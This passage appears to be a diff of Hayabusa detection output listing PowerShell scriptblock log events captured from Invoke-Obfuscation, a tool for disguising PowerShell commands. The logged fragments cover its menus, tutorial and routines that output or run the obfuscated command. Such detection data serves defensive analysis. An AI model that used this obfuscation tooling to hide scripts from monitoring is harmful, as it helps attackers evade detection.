Company. .LINK http://www.danielbohannon.com #> # Set potentially-updated script-level values in $Script:OptionsMenu before displaying. $Counter = 0 ForEach($Line in $Script:OptionsMenu) { If($Line[0].ToLower().Trim() -eq 'scriptpath') {$Script:OptionsMenu[$Counter][1] = $Script:ScriptPath} If($Line[0].ToLower().Trim() -eq 'scriptblock') {$Script:OptionsMenu[$Counter][1] = $Script:ScriptBlock} If($Line[0].ToLower().Trim() -eq 'commandlinesyntax') {$Script:OptionsMenu[$Counter][1] = $Script:CliSyntax} If($Line[0].ToLower().Trim() -eq 'executioncommands') {$Script:OptionsMenu[$Counter][1] = $Script:ExecutionCommands} If($Line[0].ToLower().Trim() -eq 'obfuscatedcommand') { # Only add obfuscatedcommand if it is different than scriptblock (to avoid showing obfuscatedcommand before it has been obfuscated). If($Script:ObfuscatedCommand -cne $Script:ScriptBlock) {$Script:OptionsMenu[$Counter][1] = $Script:ObfuscatedCommand} Else {$Script:OptionsMenu[$Counter][1] = ''} } If($Line[0].ToLower().Trim() -eq 'obfuscationlength') { # Only set/display ObfuscationLength if there is an obfuscated command. If(($Script:ObfuscatedCommand.Length -gt 0) -AND ($Script:ObfuscatedCommand -cne $Script:ScriptBlock)) {$Script:OptionsMenu[$Counter][1] = $Script:ObfuscatedCommand.Length} Else {$Script:OptionsMenu[$Counter][1] = ''} } $Counter++",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"r\$($UserInputOutputFilePath.Trim())"" } Else { # User input is a full file path. $OutputFilePath = $UserInputOutputFilePath } # Write ObfuscatedCommand out to disk. Write-Output $Script:ObfuscatedCommand > $OutputFilePath If($Script:LauncherApplied -AND (Test-Path $OutputFilePath)) { $Script:CliSyntax += ""out $OutputFilePath"" Write-Host ""`nSuccessfully output ObfuscatedCommand to"" -NoNewLine -ForegroundColor Cyan Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow Write-Host "".`nA Launcher has been applied so this script cannot be run as a standalone .ps1 file."" -ForegroundColor Cyan C:\Windows\Notepad.exe $OutputFilePath } ElseIf(!$Script:LauncherApplied -AND (Test-Path $OutputFilePath)) { $Script:CliSyntax += ""out $OutputFilePath"" Write-Host ""`nSuccessfully output ObfuscatedCommand to"" -NoNewLine -ForegroundColor Cyan Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow Write-Host ""."" -ForegroundColor Cyan C:\Windows\Notepad.exe $OutputFilePath } Else { Write-Host ""`nERROR: Unable to write ObfuscatedCommand out to"" -NoNewLine -ForegroundColor Red Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow } } ElseIf($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" There isn't anything to write out to disk.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } } ElseIf($CopyToClipboardInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne '') -AND ($Script:ObfuscatedCommand -ceq $Script:ScriptBlock)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" You haven't applied any obfuscation.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { # Copy ObfuscatedCommand to clipboard. # Try-Catch block introduced since PowerShell v2.0 without -STA defined will not be able to perform clipboard functionality. Try { $Null = [Reflection.Assembly]::LoadWithPartialName(""System.Windows.Forms"") [Windows.Forms.Clipboard]::SetText($Script:ObfuscatedCommand) If($Script:LauncherApplied) { Write-Host ""`n`nSuccessfully copied ObfuscatedCommand to clipboard."" -ForegroundColor Cyan } Else { Write-Host ""`n`nSuccessfully copied ObfuscatedCommand to clipboard.`nNo Launcher has been applied, so command can only be pasted into powershell.exe."" -ForegroundColor Cyan } } Catch { $ErrorMessage = ""Clipboard functionality will not work in PowerShell version $($PsVersionTable.PsVersion.Major) unless you add -STA (Single-Threaded Apartment) execution flag to powershell.exe."" If((Get-Command Write-Host).CommandType -ne 'Cmdlet') { # Retrieving Write-Host and Start-Sleep Cmdlets to get around the current proxy functions of Write-Host and Start-Sleep that are overloaded if -Quiet flag was used. . ((Get-Command Write-Host) | Where-Object {$_.CommandType -eq 'Cmdlet'}) ""`n`nWARNING: "" -NoNewLine -ForegroundColor Red . ((Get-Command Write-Host) | Where-Object {$_.CommandType -eq 'Cmdlet'}) $ErrorMessage -NoNewLine . ((Get-Command Start-Sleep) | Where-Object {$_.CommandType -eq 'Cmdlet'}) 2 } Else { Write-Host ""`n`nWARNING: "" -NoNewLine -ForegroundColor Red Write-Host $ErrorMessage If($Script:CliSyntax -gt 0) {Start-Sleep 2} } } $Script:CliSyntax += 'clip' } ElseIf($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" There isn't anything to copy to your clipboard.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" -NoNewLine } } ElseIf($ExecutionInputOptions[0] -Contains $UserInput) { If($Script:LauncherApplied) { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute because you have applied a Launcher.`n Enter"" -NoNewLine Write-Host "" COPY"" -NoNewLine -ForeGroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CLIP"" -NoNewLine -ForeGroundColor Yellow Write-Host "" and paste into cmd.exe.`n Or enter"" -NoNewLine Write-Host "" UNDO"" -NoNewLine -ForeGroundColor Yellow Write-Host "" to remove the Launcher from ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { If($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) {Write-Host ""`n`nInvoking (though you haven't obfuscated anything yet):""} Else {Write-Host ""`n`nInvoking:""} Out-ScriptContents $Script:ObfuscatedCommand Write-Host '' $null = Invoke-Expression $Script:ObfuscatedCommand } Else { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute because you have not set ScriptPath or ScriptBlock.`n Enter"" -NoNewline Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" to set ScriptPath or ScriptBlock."" } } Else { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" You entered an invalid option. Enter"" -NoNewLine Write-Host "" HELP"" -NoNewLine -ForegroundColor Yellow Write-Host "" for more information."" # If the failed input was part of $Script:CompoundCommand then cancel out the rest of the compound command so it is not further processed. If($Script:CompoundCommand.Count -gt 0) { $Script:CompoundCommand = @() } # Output all available/acceptable options for current menu if invalid input was entered. If($AcceptableInput.Count -gt 1) { $Message = 'Valid options for current menu include:' } Else { $Message = 'Valid option for current menu includes:' } Write-Host "" $Message "" -NoNewLine $Counter=0 ForEach($AcceptableOption in $AcceptableInput) { $Counter++ # Change color and verbiage if acceptable options will execute an obfuscation function. If($SelectionContainsCommand) { $ColorToOutput = 'Green' } Else { $ColorToOutput = 'Yellow' } Write-Host $AcceptableOption -NoNewLine -ForegroundColor $ColorToOutput If(($Counter -lt $AcceptableInput.Length) -AND ($AcceptableOption.Length -gt 0)) { Write-Host ', ' -NoNewLine } } Write-Host '' } } } Return $UserInput.ToLower() } Function Show-OptionsMenu { <# .SYNOPSIS HELPER FUNCTION :: Displays options menu for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-OptionsMenu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-OptionsMenu displays options menu for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-OptionsMenu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Set potentially-updated script-level values in $Script:OptionsMenu before displaying. $Counter = 0 ForEach($Line in $Script:OptionsMenu) { If($Line[0].ToLower().Trim() -eq 'scriptpath') {$Script:OptionsMenu[$Counter][1] = $Script:ScriptPath} If($Line[0].ToLower().Trim() -eq 'scriptblock') {$Script:OptionsMenu[$Counter][1] = $Script:ScriptBlock} If($Line[0].ToLower().Trim() -eq 'commandlinesyntax') {$Script:OptionsMenu[$Counter][1] = $Script:CliSyntax} If($Line[0].ToLower().Trim() -eq 'executioncommands') {$Script:OptionsMenu[$Counter][1] = $Script:ExecutionCommands} If($Line[0].ToLower().Trim() -eq 'obfuscatedcommand') { # Only add obfuscatedcommand if it is different than scriptblock (to avoid showing obfuscatedcommand before it has been obfuscated). If($Script:ObfuscatedCommand -cne $Script:ScriptBlock) {$Script:OptionsMenu[$Counter][1] = $Script:ObfuscatedCommand} Else {$Script:OptionsMenu[$Counter][1] = ''} } If($Line[0].ToLower().Trim() -eq 'obfuscationlength') { # Only set/display ObfuscationLength if there is an obfuscated command. If(($Script:ObfuscatedCommand.Length -gt 0) -AND ($Script:ObfuscatedCommand -cne $Script:ScriptBlock)) {$Script:OptionsMenu[$Counter][1] = $Script:ObfuscatedCommand.Length} Else {$Script:OptionsMenu[$Counter][1] = ''} } $Counter++",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"} # Output menu. Write-Host ""`n`nSHOW OPTIONS"" -NoNewLine -ForegroundColor Cyan Write-Host "" ::"" -NoNewLine Write-Host "" Yellow"" -NoNewLine -ForegroundColor Yellow Write-Host "" options can be set by entering"" -NoNewLine Write-Host "" SET OPTIONNAME VALUE"" -NoNewLine -ForegroundColor Green Write-Host "".`n"" ForEach($Option in $Script:OptionsMenu) { $OptionTitle = $Option[0] $OptionValue = $Option[1] $CanSetValue = $Option[2] Write-Host $LineSpacing -NoNewLine # For options that can be set by user, output as Yellow. If($CanSetValue) {Write-Host $OptionTitle -NoNewLine -ForegroundColor Yellow} Else {Write-Host $OptionTitle -NoNewLine} Write-Host "": "" -NoNewLine # Handle coloring and multi-value output for ExecutionCommands and ObfuscationLength. If($OptionTitle -eq 'ObfuscationLength') { Write-Host $OptionValue -ForegroundColor Cyan } ElseIf($OptionTitle -eq 'ScriptBlock') { Out-ScriptContents $OptionValue } ElseIf($OptionTitle -eq 'CommandLineSyntax') { # CLISyntax output. $SetSyntax = '' If(($Script:ScriptPath.Length -gt 0) -AND ($Script:ScriptPath -ne 'N/A')) { $SetSyntax = "" -ScriptPath '$Script:ScriptPath'"" } ElseIf(($Script:ScriptBlock.Length -gt 0) -AND ($Script:ScriptPath -eq 'N/A')) { $SetSyntax = "" -ScriptBlock {$Script:ScriptBlock}"" } $CommandSyntax = '' If($OptionValue.Count -gt 0) { $CommandSyntax = "" -Command '"" + ($OptionValue -Join ',') + ""' -Quiet"" } If(($SetSyntax -ne '') -OR ($CommandSyntax -ne '')) { $CliSyntaxToOutput = ""Invoke-Obfuscation"" + $SetSyntax + $CommandSyntax Write-Host $CliSyntaxToOutput -ForegroundColor Cyan } Else { Write-Host '' } } ElseIf($OptionTitle -eq 'ExecutionCommands') { # ExecutionCommands output. If($OptionValue.Count -gt 0) {Write-Host ''} $Counter = 0 ForEach($ExecutionCommand in $OptionValue) { $Counter++ If($ExecutionCommand.Length -eq 0) {Write-Host ''; Continue} $ExecutionCommand = $ExecutionCommand.Replace('$ScriptBlock','~').Split('~') Write-Host "" $($ExecutionCommand[0])"" -NoNewLine -ForegroundColor Cyan Write-Host '$ScriptBlock' -NoNewLine -ForegroundColor Magenta # Handle output formatting when SHOW OPTIONS is run. If(($OptionValue.Count -gt 0) -AND ($Counter -lt $OptionValue.Count)) { Write-Host $ExecutionCommand[1] -ForegroundColor Cyan } Else { Write-Host $ExecutionCommand[1] -NoNewLine -ForegroundColor Cyan } } Write-Host '' } ElseIf($OptionTitle -eq 'ObfuscatedCommand') { Out-ScriptContents $OptionValue } Else { Write-Host $OptionValue -ForegroundColor Magenta } } } Function Show-HelpMenu { <# .SYNOPSIS HELPER FUNCTION :: Displays help menu for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-HelpMenu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-HelpMenu displays help menu for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-HelpMenu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Show Help Menu. Write-Host ""`n`nHELP MENU"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Available"" -NoNewLine Write-Host "" options"" -NoNewLine -ForegroundColor Yellow Write-Host "" shown below:`n"" ForEach($InputOptionsList in $AllAvailableInputOptionsLists) { $InputOptionsCommands = $InputOptionsList[0] $InputOptionsDescription = $InputOptionsList[1] # Add additional coloring to string encapsulated by <> if it exists in $InputOptionsDescription. If($InputOptionsDescription.Contains('<') -AND $InputOptionsDescription.Contains('>')) { $FirstPart = $InputOptionsDescription.SubString(0,$InputOptionsDescription.IndexOf('<')) $MiddlePart = $InputOptionsDescription.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $InputOptionsDescription.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""$LineSpacing $FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan Write-Host $LastPart -NoNewLine } Else { Write-Host ""$LineSpacing $InputOptionsDescription"" -NoNewLine } $Counter = 0 ForEach($Command in $InputOptionsCommands) { $Counter++ Write-Host $Command.ToUpper() -NoNewLine -ForegroundColor Yellow If($Counter -lt $InputOptionsCommands.Count) {Write-Host ',' -NoNewLine} } Write-Host '' } } Function Show-Tutorial { <# .SYNOPSIS HELPER FUNCTION :: Displays tutorial information for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-Tutorial Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-Tutorial displays tutorial information for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-Tutorial .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Write-Host ""`n`nTUTORIAL"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Here is a quick tutorial showing you how to get your obfuscation on:"" Write-Host ""`n1) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Load a scriptblock (SET SCRIPTBLOCK) or a script path/URL (SET SCRIPTPATH)."" Write-Host "" SET SCRIPTBLOCK Write-Host 'This is my test command' -ForegroundColor Green"" -ForegroundColor Green Write-Host ""`n2) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Navigate through the obfuscation menus where the options are in"" -NoNewLine Write-Host "" YELLOW"" -NoNewLine -ForegroundColor Yellow Write-Host ""."" Write-Host "" GREEN"" -NoNewLine -ForegroundColor Green Write-Host "" options apply obfuscation."" Write-Host "" Enter"" -NoNewLine Write-Host "" BACK"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CD .."" -NoNewLine -ForegroundColor Yellow Write-Host "" to go to previous menu and"" -NoNewLine Write-Host "" HOME"" -NoNewline -ForegroundColor Yellow Write-Host ""/"" -NoNewline Write-Host ""MAIN"" -NoNewline -ForegroundColor Yellow Write-Host "" to go to home menu.`n E.g. Enter"" -NoNewLine Write-Host "" ENCODING"" -NoNewLine -ForegroundColor Yellow Write-Host "" & then"" -NoNewLine Write-Host "" 5"" -NoNewLine -ForegroundColor Green Write-Host "" to apply SecureString obfuscation."" Write-Host ""`n3) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" TEST"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""EXEC"" -NoNewLine -ForegroundColor Yellow Write-Host "" to test the obfuscated command locally.`n Enter"" -NoNewLine Write-Host "" SHOW"" -NoNewLine -ForegroundColor Yellow Write-Host "" to see the currently obfuscated command."" Write-Host ""`n4) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" COPY"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CLIP"" -NoNewLine -ForegroundColor Yellow Write-Host "" to copy obfuscated command out to your clipboard."" Write-Host "" Enter"" -NoNewLine Write-Host "" OUT"" -NoNewLine -ForegroundColor Yellow Write-Host "" to write obfuscated command out to disk."" Write-Host ""`n5) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" RESET"" -NoNewLine -ForegroundColor Yellow Write-Host "" to remove all obfuscation and start over.`n Enter"" -NoNewLine Write-Host "" UNDO"" -NoNewLine -ForegroundColor Yellow Write-Host "" to undo last obfuscation.`n Enter"" -NoNewLine Write-Host "" HELP"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""?"" -NoNewLine -ForegroundColor Yellow Write-Host "" for help menu."" Write-Host ""`nAnd finally the obligatory `""Don't use this for evil, please`"""" -NoNewLine -ForegroundColor Cyan Write-Host "" :)"" -ForegroundColor Green } Function Out-ScriptContents { <# .SYNOPSIS HELPER FUNCTION :: Displays current obfuscated command for Invoke-Obfuscation. Invoke-Obfuscation Function: Out-ScriptContents Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ScriptContents displays current obfuscated command for Invoke-Obfuscation. .PARAMETER ScriptContents Specifies the string containing your payload. .PARAMETER PrintWarning Switch to output redacted form of ScriptContents if they exceed 8,190 characters. .EXAMPLE C:\PS> Out-ScriptContents .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Param( [Parameter(ValueFromPipeline = $true)] [String] $ScriptContents, [Switch] $PrintWarning ) If($ScriptContents.Length -gt $CmdMaxLength) { # Output ScriptContents, handling if the size of ScriptContents exceeds $CmdMaxLength characters. $RedactedPrintLength = $CmdMaxLength/5 # Handle printing redaction message in middle of screen. #OCD $CmdLineWidth = (Get-Host).UI.RawUI.BufferSize.Width $RedactionMessage = ""<REDACTED: ObfuscatedLength = $($ScriptContents.Length)>"" $CenteredRedactionMessageStartIndex = (($CmdLineWidth-$RedactionMessage.Length)/2) - ""[*] ObfuscatedCommand: "".Length $CurrentRedactionMessageStartIndex = ($RedactedPrintLength % $CmdLineWidth) If($CurrentRedactionMessageStartIndex -gt $CenteredRedactionMessageStartIndex) { $RedactedPrintLength = $RedactedPrintLength-($CurrentRedactionMessageStartIndex-$CenteredRedactionMessageStartIndex) } Else { $RedactedPrintLength = $RedactedPrintLength+($CenteredRedactionMessageStartIndex-$CurrentRedactionMessageStartIndex) } Write-Host $ScriptContents.SubString(0,$RedactedPrintLength) -NoNewLine -ForegroundColor Magenta Write-",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"} # Output menu. Write-Host ""`n`nSHOW OPTIONS"" -NoNewLine -ForegroundColor Cyan Write-Host "" ::"" -NoNewLine Write-Host "" Yellow"" -NoNewLine -ForegroundColor Yellow Write-Host "" options can be set by entering"" -NoNewLine Write-Host "" SET OPTIONNAME VALUE"" -NoNewLine -ForegroundColor Green Write-Host "".`n"" ForEach($Option in $Script:OptionsMenu) { $OptionTitle = $Option[0] $OptionValue = $Option[1] $CanSetValue = $Option[2] Write-Host $LineSpacing -NoNewLine # For options that can be set by user, output as Yellow. If($CanSetValue) {Write-Host $OptionTitle -NoNewLine -ForegroundColor Yellow} Else {Write-Host $OptionTitle -NoNewLine} Write-Host "": "" -NoNewLine # Handle coloring and multi-value output for ExecutionCommands and ObfuscationLength. If($OptionTitle -eq 'ObfuscationLength') { Write-Host $OptionValue -ForegroundColor Cyan } ElseIf($OptionTitle -eq 'ScriptBlock') { Out-ScriptContents $OptionValue } ElseIf($OptionTitle -eq 'CommandLineSyntax') { # CLISyntax output. $SetSyntax = '' If(($Script:ScriptPath.Length -gt 0) -AND ($Script:ScriptPath -ne 'N/A')) { $SetSyntax = "" -ScriptPath '$Script:ScriptPath'"" } ElseIf(($Script:ScriptBlock.Length -gt 0) -AND ($Script:ScriptPath -eq 'N/A')) { $SetSyntax = "" -ScriptBlock {$Script:ScriptBlock}"" } $CommandSyntax = '' If($OptionValue.Count -gt 0) { $CommandSyntax = "" -Command '"" + ($OptionValue -Join ',') + ""' -Quiet"" } If(($SetSyntax -ne '') -OR ($CommandSyntax -ne '')) { $CliSyntaxToOutput = ""Invoke-Obfuscation"" + $SetSyntax + $CommandSyntax Write-Host $CliSyntaxToOutput -ForegroundColor Cyan } Else { Write-Host '' } } ElseIf($OptionTitle -eq 'ExecutionCommands') { # ExecutionCommands output. If($OptionValue.Count -gt 0) {Write-Host ''} $Counter = 0 ForEach($ExecutionCommand in $OptionValue) { $Counter++ If($ExecutionCommand.Length -eq 0) {Write-Host ''; Continue} $ExecutionCommand = $ExecutionCommand.Replace('$ScriptBlock','~').Split('~') Write-Host "" $($ExecutionCommand[0])"" -NoNewLine -ForegroundColor Cyan Write-Host '$ScriptBlock' -NoNewLine -ForegroundColor Magenta # Handle output formatting when SHOW OPTIONS is run. If(($OptionValue.Count -gt 0) -AND ($Counter -lt $OptionValue.Count)) { Write-Host $ExecutionCommand[1] -ForegroundColor Cyan } Else { Write-Host $ExecutionCommand[1] -NoNewLine -ForegroundColor Cyan } } Write-Host '' } ElseIf($OptionTitle -eq 'ObfuscatedCommand') { Out-ScriptContents $OptionValue } Else { Write-Host $OptionValue -ForegroundColor Magenta } } } Function Show-HelpMenu { <# .SYNOPSIS HELPER FUNCTION :: Displays help menu for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-HelpMenu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-HelpMenu displays help menu for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-HelpMenu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Show Help Menu. Write-Host ""`n`nHELP MENU"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Available"" -NoNewLine Write-Host "" options"" -NoNewLine -ForegroundColor Yellow Write-Host "" shown below:`n"" ForEach($InputOptionsList in $AllAvailableInputOptionsLists) { $InputOptionsCommands = $InputOptionsList[0] $InputOptionsDescription = $InputOptionsList[1] # Add additional coloring to string encapsulated by <> if it exists in $InputOptionsDescription. If($InputOptionsDescription.Contains('<') -AND $InputOptionsDescription.Contains('>')) { $FirstPart = $InputOptionsDescription.SubString(0,$InputOptionsDescription.IndexOf('<')) $MiddlePart = $InputOptionsDescription.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $InputOptionsDescription.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""$LineSpacing $FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan Write-Host $LastPart -NoNewLine } Else { Write-Host ""$LineSpacing $InputOptionsDescription"" -NoNewLine } $Counter = 0 ForEach($Command in $InputOptionsCommands) { $Counter++ Write-Host $Command.ToUpper() -NoNewLine -ForegroundColor Yellow If($Counter -lt $InputOptionsCommands.Count) {Write-Host ',' -NoNewLine} } Write-Host '' } } Function Show-Tutorial { <# .SYNOPSIS HELPER FUNCTION :: Displays tutorial information for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-Tutorial Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-Tutorial displays tutorial information for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-Tutorial .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Write-Host ""`n`nTUTORIAL"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Here is a quick tutorial showing you how to get your obfuscation on:"" Write-Host ""`n1) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Load a scriptblock (SET SCRIPTBLOCK) or a script path/URL (SET SCRIPTPATH)."" Write-Host "" SET SCRIPTBLOCK Write-Host 'This is my test command' -ForegroundColor Green"" -ForegroundColor Green Write-Host ""`n2) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Navigate through the obfuscation menus where the options are in"" -NoNewLine Write-Host "" YELLOW"" -NoNewLine -ForegroundColor Yellow Write-Host ""."" Write-Host "" GREEN"" -NoNewLine -ForegroundColor Green Write-Host "" options apply obfuscation."" Write-Host "" Enter"" -NoNewLine Write-Host "" BACK"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CD .."" -NoNewLine -ForegroundColor Yellow Write-Host "" to go to previous menu and"" -NoNewLine Write-Host "" HOME"" -NoNewline -ForegroundColor Yellow Write-Host ""/"" -NoNewline Write-Host ""MAIN"" -NoNewline -ForegroundColor Yellow Write-Host "" to go to home menu.`n E.g. Enter"" -NoNewLine Write-Host "" ENCODING"" -NoNewLine -ForegroundColor Yellow Write-Host "" & then"" -NoNewLine Write-Host "" 5"" -NoNewLine -ForegroundColor Green Write-Host "" to apply SecureString obfuscation."" Write-Host ""`n3) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" TEST"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""EXEC"" -NoNewLine -ForegroundColor Yellow Write-Host "" to test the obfuscated command locally.`n Enter"" -NoNewLine Write-Host "" SHOW"" -NoNewLine -ForegroundColor Yellow Write-Host "" to see the currently obfuscated command."" Write-Host ""`n4) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" COPY"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CLIP"" -NoNewLine -ForegroundColor Yellow Write-Host "" to copy obfuscated command out to your clipboard."" Write-Host "" Enter"" -NoNewLine Write-Host "" OUT"" -NoNewLine -ForegroundColor Yellow Write-Host "" to write obfuscated command out to disk."" Write-Host ""`n5) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" RESET"" -NoNewLine -ForegroundColor Yellow Write-Host "" to remove all obfuscation and start over.`n Enter"" -NoNewLine Write-Host "" UNDO"" -NoNewLine -ForegroundColor Yellow Write-Host "" to undo last obfuscation.`n Enter"" -NoNewLine Write-Host "" HELP"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""?"" -NoNewLine -ForegroundColor Yellow Write-Host "" for help menu."" Write-Host ""`nAnd finally the obligatory `""Don't use this for evil, please`"""" -NoNewLine -ForegroundColor Cyan Write-Host "" :)"" -ForegroundColor Green } Function Out-ScriptContents { <# .SYNOPSIS HELPER FUNCTION :: Displays current obfuscated command for Invoke-Obfuscation. Invoke-Obfuscation Function: Out-ScriptContents Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ScriptContents displays current obfuscated command for Invoke-Obfuscation. .PARAMETER ScriptContents Specifies the string containing your payload. .PARAMETER PrintWarning Switch to output redacted form of ScriptContents if they exceed 8,190 characters. .EXAMPLE C:\PS> Out-ScriptContents .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Param( [Parameter(ValueFromPipeline = $true)] [String] $ScriptContents, [Switch] $PrintWarning ) If($ScriptContents.Length -gt $CmdMaxLength) { # Output ScriptContents, handling if the size of ScriptContents exceeds $CmdMaxLength characters. $RedactedPrintLength = $CmdMaxLength/5 # Handle printing redaction message in middle of screen. #OCD $CmdLineWidth = (Get-Host).UI.RawUI.BufferSize.Width $RedactionMessage = ""<REDACTED: ObfuscatedLength = $($ScriptContents.Length)>"" $CenteredRedactionMessageStartIndex = (($CmdLineWidth-$RedactionMessage.Length)/2) - ""[*] ObfuscatedCommand: "".Length $CurrentRedactionMessageStartIndex = ($RedactedPrintLength % $CmdLineWidth) If($CurrentRedactionMessageStartIndex -gt $CenteredRedactionMessageStartIndex) { $RedactedPrintLength = $RedactedPrintLength-($CurrentRedactionMessageStartIndex-$CenteredRedactionMessageStartIndex) } Else { $RedactedPrintLength = $RedactedPrintLength+($CenteredRedactionMessageStartIndex-$CurrentRedactionMessageStartIndex) } Write-Host $ScriptContents.SubString(0,$RedactedPrintLength) -NoNewLine -ForegroundColor Magenta Write-",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
